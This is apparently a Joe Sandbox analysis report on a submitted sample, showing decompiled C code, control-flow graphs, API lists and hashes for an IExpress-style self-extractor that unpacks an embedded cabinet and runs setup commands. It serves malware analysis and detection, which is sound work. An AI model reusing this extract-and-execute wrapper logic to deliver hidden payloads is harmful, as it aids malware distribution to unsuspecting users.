                                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00401BFE
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00401C57
                                                                                                                                                                                                                                    • GetPrivateProfileIntA.KERNEL32 ref: 00401C88
                                                                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00401140,00000000,00000008,?), ref: 00401CB8
                                                                                                                                                                                                                                    • GetShortPathNameA.KERNEL32 ref: 00401D1B
                                                                                                                                                                                                                                      • Part of subcall function 004044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
                                                                                                                                                                                                                                      • Part of subcall function 004044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                                                    • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                                                    • API String ID: 383838535-3368923722
                                                                                                                                                                                                                                    • Opcode ID: c5cde542d379b8b3dcabaeaf6ab9f809cbf586cc6fbce848f7e7d0055dd29b84
                                                                                                                                                                                                                                    • Instruction ID: 1854ec0ea07248ced4697d7887c5e08e33d5be07c387e2280b7d80fdedc59c7f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c5cde542d379b8b3dcabaeaf6ab9f809cbf586cc6fbce848f7e7d0055dd29b84
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02A15870A002186BEB209B24CC44FEA3769AF55314F1442BBF955B72E1DBBC9D86CB5C
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0040597D Relevance: 19.7, APIs: 13, Instructions: 212windowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 324 40597d-4059b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 4059bb-4059d8 call 4044b9 call 406285 324->325 326 4059dd-405a1b GetDiskFreeSpaceA 324->326 341 405c05-405c14 call 406ce0 325->341 328 405ba1-405bde memset call 406285 GetLastError FormatMessageA 326->328 329 405a21-405a4a MulDiv 326->329 338 405be3-405bfc call 4044b9 SetCurrentDirectoryA 328->338 329->328 332 405a50-405a6c GetVolumeInformationA 329->332 335 405ab5-405aca SetCurrentDirectoryA 332->335 336 405a6e-405ab0 memset call 406285 GetLastError FormatMessageA 332->336 340 405acc-405ad1 335->340 336->338 353 405c02 338->353 344 405ae2-405ae4 340->344 345 405ad3-405ad8 340->345 346 405ae6 344->346 347 405ae7-405af8 344->347 345->344 349 405ada-405ae0 345->349 346->347 352 405af9-405afb 347->352 349->340 349->344 354 405b05-405b08 352->354 355 405afd-405b03 352->355 356 405c04 353->356 357 405b20-405b27 354->357 358 405b0a-405b1b call 4044b9 354->358 355->352 355->354 356->341 360 405b52-405b5b 357->360 361 405b29-405b33 357->361 358->353 364 405b62-405b6d 360->364 361->360 363 405b35-405b50 361->363 363->364 365 405b76-405b7d 364->365 366 405b6f-405b74 364->366 368 405b83 365->368 369 405b7f-405b81 365->369 367 405b85 366->367 370 405b96-405b9f 367->370 371 405b87-405b94 call 40268b 367->371 368->367 369->367 370->356 371->356
                                                                                                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                                                                                                    			E0040597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v16;
				char _v276;
				char _v788;
				long _v792;
				long _v796;
				long _v800;
				signed int _v804;
				long _v808;
				int _v812;
				long _v816;
				long _v820;
				void* __ebx;
				void* __esi;
				signed int _t46;
				int _t50;
				signed int _t55;
				void* _t66;
				int _t69;
				signed int _t73;
				signed short _t78;
				signed int _t87;
				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0x408004; // 0x8f135e3b
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0x409124 = E00406285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E004044B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0x409a34 & 0x00000008;
							if(( *0x409a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0x409a38; // 0x0
								_t110 =  *((intOrPtr*)(0x4089e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0x409124 = 0;
									_t66 = 1;
								} else {
									_t66 = E0040268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0x409a38; // 0x0
							_t110 =  *((intOrPtr*)(0x4089e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x4089e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0x409a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E004044B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset( &_v788, 0, 0x200);
					 *0x409124 = E00406285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
					_t110 = 0x4f9;
					goto L30;
				} else {
					_t110 = 0x4bc;
					E004044B9(0, 0x4bc, 0, 0, 0x10, 0);
					 *0x409124 = E00406285();
					_t66 = 0;
					L33:
					return E00406CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
				}
			}



































                                                                                                                                                                                                                                    0x0040597d
                                                                                                                                                                                                                                    0x00405988
                                                                                                                                                                                                                                    0x0040598f
                                                                                                                                                                                                                                    0x0040599a
                                                                                                                                                                                                                                    0x004059a6
                                                                                                                                                                                                                                    0x004059a8
                                                                                                                                                                                                                                    0x004059af
                                                                                                                                                                                                                                    0x004059b9
                                                                                                                                                                                                                                    0x004059dd
                                                                                                                                                                                                                                    0x004059e4
                                                                                                                                                                                                                                    0x004059f1
                                                                                                                                                                                                                                    0x004059fe
                                                                                                                                                                                                                                    0x00405a0b
                                                                                                                                                                                                                                    0x00405a13
                                                                                                                                                                                                                                    0x00405a19
                                                                                                                                                                                                                                    0x00405a1b
                                                                                                                                                                                                                                    0x00405ba1
                                                                                                                                                                                                                                    0x00405baf
                                                                                                                                                                                                                                    0x00405bbd
                                                                                                                                                                                                                                    0x00405bd8
                                                                                                                                                                                                                                    0x00405bde
                                                                                                                                                                                                                                    0x00405be3
                                                                                                                                                                                                                                    0x00405bec
                                                                                                                                                                                                                                    0x00405bf0
                                                                                                                                                                                                                                    0x00405bfc
                                                                                                                                                                                                                                    0x00405c02
                                                                                                                                                                                                                                    0x00405c02
                                                                                                                                                                                                                                    0x00405c02
                                                                                                                                                                                                                                    0x00405c04
                                                                                                                                                                                                                                    0x00405c04
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405c04
                                                                                                                                                                                                                                    0x00405a27
                                                                                                                                                                                                                                    0x00405a3a
                                                                                                                                                                                                                                    0x00405a46
                                                                                                                                                                                                                                    0x00405a48
                                                                                                                                                                                                                                    0x00405a4a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405a64
                                                                                                                                                                                                                                    0x00405a6a
                                                                                                                                                                                                                                    0x00405a6c
                                                                                                                                                                                                                                    0x00405abc
                                                                                                                                                                                                                                    0x00405ac2
                                                                                                                                                                                                                                    0x00405ac9
                                                                                                                                                                                                                                    0x00405aca
                                                                                                                                                                                                                                    0x00405aca
                                                                                                                                                                                                                                    0x00405acc
                                                                                                                                                                                                                                    0x00405acc
                                                                                                                                                                                                                                    0x00405acf
                                                                                                                                                                                                                                    0x00405ad1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405ad3
                                                                                                                                                                                                                                    0x00405ad6
                                                                                                                                                                                                                                    0x00405ad8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405ada
                                                                                                                                                                                                                                    0x00405adc
                                                                                                                                                                                                                                    0x00405add
                                                                                                                                                                                                                                    0x00405add
                                                                                                                                                                                                                                    0x00405ae0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405ae0
                                                                                                                                                                                                                                    0x00405ae2
                                                                                                                                                                                                                                    0x00405ae4
                                                                                                                                                                                                                                    0x00405ae6
                                                                                                                                                                                                                                    0x00405ae6
                                                                                                                                                                                                                                    0x00405ae6
                                                                                                                                                                                                                                    0x00405ae9
                                                                                                                                                                                                                                    0x00405aeb
                                                                                                                                                                                                                                    0x00405af0
                                                                                                                                                                                                                                    0x00405af6
                                                                                                                                                                                                                                    0x00405af8
                                                                                                                                                                                                                                    0x00405af9
                                                                                                                                                                                                                                    0x00405af9
                                                                                                                                                                                                                                    0x00405afb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405afd
                                                                                                                                                                                                                                    0x00405aff
                                                                                                                                                                                                                                    0x00405b00
                                                                                                                                                                                                                                    0x00405b03
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405b03
                                                                                                                                                                                                                                    0x00405b05
                                                                                                                                                                                                                                    0x00405b08
                                                                                                                                                                                                                                    0x00405b20
                                                                                                                                                                                                                                    0x00405b27
                                                                                                                                                                                                                                    0x00405b52
                                                                                                                                                                                                                                    0x00405b52
                                                                                                                                                                                                                                    0x00405b5b
                                                                                                                                                                                                                                    0x00405b62
                                                                                                                                                                                                                                    0x00405b6b
                                                                                                                                                                                                                                    0x00405b6d
                                                                                                                                                                                                                                    0x00405b76
                                                                                                                                                                                                                                    0x00405b7d
                                                                                                                                                                                                                                    0x00405b83
                                                                                                                                                                                                                                    0x00405b7f
                                                                                                                                                                                                                                    0x00405b7f
                                                                                                                                                                                                                                    0x00405b7f
                                                                                                                                                                                                                                    0x00405b6f
                                                                                                                                                                                                                                    0x00405b72
                                                                                                                                                                                                                                    0x00405b72
                                                                                                                                                                                                                                    0x00405b85
                                                                                                                                                                                                                                    0x00405b98
                                                                                                                                                                                                                                    0x00405b9e
                                                                                                                                                                                                                                    0x00405b87
                                                                                                                                                                                                                                    0x00405b8f
                                                                                                                                                                                                                                    0x00405b8f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405b85
                                                                                                                                                                                                                                    0x00405b29
                                                                                                                                                                                                                                    0x00405b33
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405b35
                                                                                                                                                                                                                                    0x00405b48
                                                                                                                                                                                                                                    0x00405b4a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405b4a
                                                                                                                                                                                                                                    0x00405b0f
                                                                                                                                                                                                                                    0x00405b16
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405b16
                                                                                                                                                                                                                                    0x00405a7c
                                                                                                                                                                                                                                    0x00405a8a
                                                                                                                                                                                                                                    0x00405aa5
                                                                                                                                                                                                                                    0x00405aab
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004059bb
                                                                                                                                                                                                                                    0x004059c0
                                                                                                                                                                                                                                    0x004059c7
                                                                                                                                                                                                                                    0x004059d1
                                                                                                                                                                                                                                    0x004059d6
                                                                                                                                                                                                                                    0x00405c05
                                                                                                                                                                                                                                    0x00405c14
                                                                                                                                                                                                                                    0x00405c14

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 004059A8
                                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(?), ref: 004059AF
                                                                                                                                                                                                                                    • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00405A13
                                                                                                                                                                                                                                    • MulDiv.KERNEL32(?,?,00000400), ref: 00405A40
                                                                                                                                                                                                                                    • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00405A64
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00405A7C
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00405A98
                                                                                                                                                                                                                                    • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00405AA5
                                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00405BFC
                                                                                                                                                                                                                                      • Part of subcall function 004044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
                                                                                                                                                                                                                                      • Part of subcall function 004044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554
                                                                                                                                                                                                                                      • Part of subcall function 00406285: GetLastError.KERNEL32(00405BBC), ref: 00406285
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4237285672-0
                                                                                                                                                                                                                                    • Opcode ID: 6aaf8c91b5dca31200441e902ea9edd8fd2e2a5f7089ede1390eec398b18bba2
                                                                                                                                                                                                                                    • Instruction ID: 43d5c1b8738d8d9cee642188910e7ae7015c6787622b6f388fd3a53d4582656a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6aaf8c91b5dca31200441e902ea9edd8fd2e2a5f7089ede1390eec398b18bba2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E67195B1A0020CAFEB159F60CD85BFB77BCEB48304F0440BAF545B6281D6389E458F69
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00404FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121windowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 374 404fe0-40501a call 40468f FindResourceA LoadResource LockResource 377 405020-405027 374->377 378 405161-405163 374->378 379 405057-40505e call 404efd 377->379 380 405029-405051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->380 383 405060-405077 call 4044b9 379->383 384 40507c-4050b4 379->384 380->379 388 405107-40510e 383->388 389 4050b6-4050da 384->389 390 4050e8-405104 call 4044b9 384->390 392 405110-405117 FreeResource 388->392 393 40511d-40511f 388->393 398 405106 389->398 402 4050dc 389->402 390->398 392->393 395 405121-405127 393->395 396 40513a-405141 393->396 395->396 399 405129-405135 call 4044b9 395->399 400 405143-40514a 396->400 401 40515f 396->401 398->388 399->396 400->401 404 40514c-405159 SendMessageA 400->404 401->378 405 4050e3-4050e6 402->405 404->401 405->390 405->398
                                                                                                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                                                                                                    			E00404FE0(void* __edi, void* __eflags) {
				void* __ebx;
				void* _t8;
				struct HWND__* _t9;
				int _t10;
				void* _t12;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t29;
				void* _t33;
				int _t34;
				CHAR* _t36;
				int _t37;
				intOrPtr _t47;

				_t33 = __edi;
				_t36 = "CABINET";
				 *0x409144 = E0040468F(_t36, 0, 0);
				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
				 *0x409140 = _t8;
				if(_t8 == 0) {
					return _t8;
				}
				_t9 =  *0x408584; // 0x0
				if(_t9 != 0) {
					ShowWindow(GetDlgItem(_t9, 0x842), 0);
					ShowWindow(GetDlgItem( *0x408584, 0x841), 5);
				}
				_t10 = E00404EFD(0, 0);
				if(_t10 != 0) {
					__imp__#20(E00404CA0, E00404CC0, E00404980, E00404A50, E00404AD0, E00404B60, E00404BC0, 1, 0x409148, _t33);
					_t34 = _t10;
					if(_t34 == 0) {
						L8:
						_t29 =  *0x409148; // 0x0
						_t24 =  *0x408584; // 0x0
						E004044B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
						_t37 = 0;
						L9:
						goto L10;
					}
					__imp__#22(_t34, "*MEMCAB", 0x401140, 0, E00404CD0, 0, 0x409140); // executed
					_t37 = _t10;
					if(_t37 == 0) {
						goto L9;
					}
					__imp__#23(_t34); // executed
					if(_t10 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t27 =  *0x408584; // 0x0
					E004044B9(_t27, 0x4ba, 0, 0, 0x10, 0);
					_t37 = 0;
					L10:
					_t12 =  *0x409140; // 0x0
					if(_t12 != 0) {
						FreeResource(_t12);
						 *0x409140 = 0;
					}
					if(_t37 == 0) {
						_t47 =  *0x4091d8; // 0x0
						if(_t47 == 0) {
							E004044B9(0, 0x4f8, 0, 0, 0x10, 0);
						}
					}
					if(( *0x408a38 & 0x00000001) == 0 && ( *0x409a34 & 0x00000001) == 0) {
						SendMessageA( *0x408584, 0xfa1, _t37, 0);
					}
					return _t37;
				}
			}
















                                                                                                                                                                                                                                    0x00404fe0
                                                                                                                                                                                                                                    0x00404fe6
                                                                                                                                                                                                                                    0x00404ff9
                                                                                                                                                                                                                                    0x0040500d
                                                                                                                                                                                                                                    0x00405013
                                                                                                                                                                                                                                    0x0040501a
                                                                                                                                                                                                                                    0x00405163
                                                                                                                                                                                                                                    0x00405163
                                                                                                                                                                                                                                    0x00405020
                                                                                                                                                                                                                                    0x00405027
                                                                                                                                                                                                                                    0x00405037
                                                                                                                                                                                                                                    0x00405051
                                                                                                                                                                                                                                    0x00405051
                                                                                                                                                                                                                                    0x00405057
                                                                                                                                                                                                                                    0x0040505e
                                                                                                                                                                                                                                    0x004050a7
                                                                                                                                                                                                                                    0x004050ad
                                                                                                                                                                                                                                    0x004050b4
                                                                                                                                                                                                                                    0x004050e8
                                                                                                                                                                                                                                    0x004050e8
                                                                                                                                                                                                                                    0x004050ee
                                                                                                                                                                                                                                    0x004050ff
                                                                                                                                                                                                                                    0x00405104
                                                                                                                                                                                                                                    0x00405106
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405106
                                                                                                                                                                                                                                    0x004050cd
                                                                                                                                                                                                                                    0x004050d3
                                                                                                                                                                                                                                    0x004050da
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004050dd
                                                                                                                                                                                                                                    0x004050e6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405060
                                                                                                                                                                                                                                    0x00405060
                                                                                                                                                                                                                                    0x00405070
                                                                                                                                                                                                                                    0x00405075
                                                                                                                                                                                                                                    0x00405107
                                                                                                                                                                                                                                    0x00405107
                                                                                                                                                                                                                                    0x0040510e
                                                                                                                                                                                                                                    0x00405111
                                                                                                                                                                                                                                    0x00405117
                                                                                                                                                                                                                                    0x00405117
                                                                                                                                                                                                                                    0x0040511f
                                                                                                                                                                                                                                    0x00405121
                                                                                                                                                                                                                                    0x00405127
                                                                                                                                                                                                                                    0x00405135
                                                                                                                                                                                                                                    0x00405135
                                                                                                                                                                                                                                    0x00405127
                                                                                                                                                                                                                                    0x00405141
                                                                                                                                                                                                                                    0x00405159
                                                                                                                                                                                                                                    0x00405159
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040515f

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046A0
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: SizeofResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A9
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046C3
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: LoadResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046CC
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: LockResource.KERNEL32(00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046D3
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: memcpy_s.MSVCRT ref: 004046E5
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046EF
                                                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00404FFE
                                                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 00405006
                                                                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 0040500D
                                                                                                                                                                                                                                    • GetDlgItem.USER32(00000000,00000842), ref: 00405030
                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00405037
                                                                                                                                                                                                                                    • GetDlgItem.USER32(00000841,00000005), ref: 0040504A
                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00405051
                                                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00405111
                                                                                                                                                                                                                                    • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00405159
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                    • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                                                    • API String ID: 1305606123-2642027498
                                                                                                                                                                                                                                    • Opcode ID: 09a44ef4b14b10cb8208e50229d1ed21c6988b88aa67c305168c5717d0b677ef
                                                                                                                                                                                                                                    • Instruction ID: c7e9636301b6909bf0cfcc4fade7c16197fcaa171c04f7cf8e0346fe02231bd7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 09a44ef4b14b10cb8208e50229d1ed21c6988b88aa67c305168c5717d0b677ef
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F31C9F0B40706BBE7105F61AF89F67365CE748755F14403AFA41BA2E2DABC9C108A5D
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00402F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120libraryfileloaderCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 450 402f1d-402f3d 451 402f6c-402f73 call 405164 450->451 452 402f3f-402f46 450->452 460 403041 451->460 461 402f79-402f80 call 4055a0 451->461 454 402f48 call 4051e5 452->454 455 402f5f-402f66 call 403a3f 452->455 462 402f4d-402f4f 454->462 455->451 455->460 465 403043-403053 call 406ce0 460->465 461->460 469 402f86-402fbe GetSystemDirectoryA call 40658a LoadLibraryA 461->469 462->460 463 402f55-402f5d 462->463 463->451 463->455 472 402fc0-402fd4 GetProcAddress 469->472 473 402ff7-403004 FreeLibrary 469->473 472->473 476 402fd6-402fee DecryptFileA 472->476 474 403006-40300c 473->474 475 403017-403024 SetCurrentDirectoryA 473->475 474->475 477 40300e call 40621e 474->477 478 403054-40305a 475->478 479 403026-40303c call 4044b9 call 406285 475->479 476->473 485 402ff0-402ff5 476->485 489 403013-403015 477->489 481 403065-40306c 478->481 482 40305c call 403b26 478->482 479->460 487 40307c-403089 481->487 488 40306e-403075 call 40256d 481->488 491 403061-403063 482->491 485->473 493 4030a1-4030a9 487->493 494 40308b-403091 487->494 498 40307a 488->498 489->460 489->475 491->460 491->481 496 4030b4-4030b7 493->496 497 4030ab-4030ad 493->497 494->493 499 403093 call 403ba2 494->499 496->465 497->496 501 4030af call 404169 497->501 498->487 504 403098-40309a 499->504 501->496 504->460 505 40309c 504->505 505->493
                                                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                                                    			E00402F1D(void* __ecx, int __edx) {
				signed int _v8;
				char _v272;
				_Unknown_base(*)()* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t11;
				struct HWND__* _t12;
				void* _t14;
				int _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr* _t26;
				signed int _t27;
				void* _t30;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HINSTANCE__* _t36;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed int _t46;
				int _t47;
				void* _t58;
				void* _t59;

				_t43 = __edx;
				_t9 =  *0x408004; // 0x8f135e3b
				_v8 = _t9 ^ _t46;
				if( *0x408a38 != 0) {
					L5:
					_t11 = E00405164(_t52);
					_t53 = _t11;
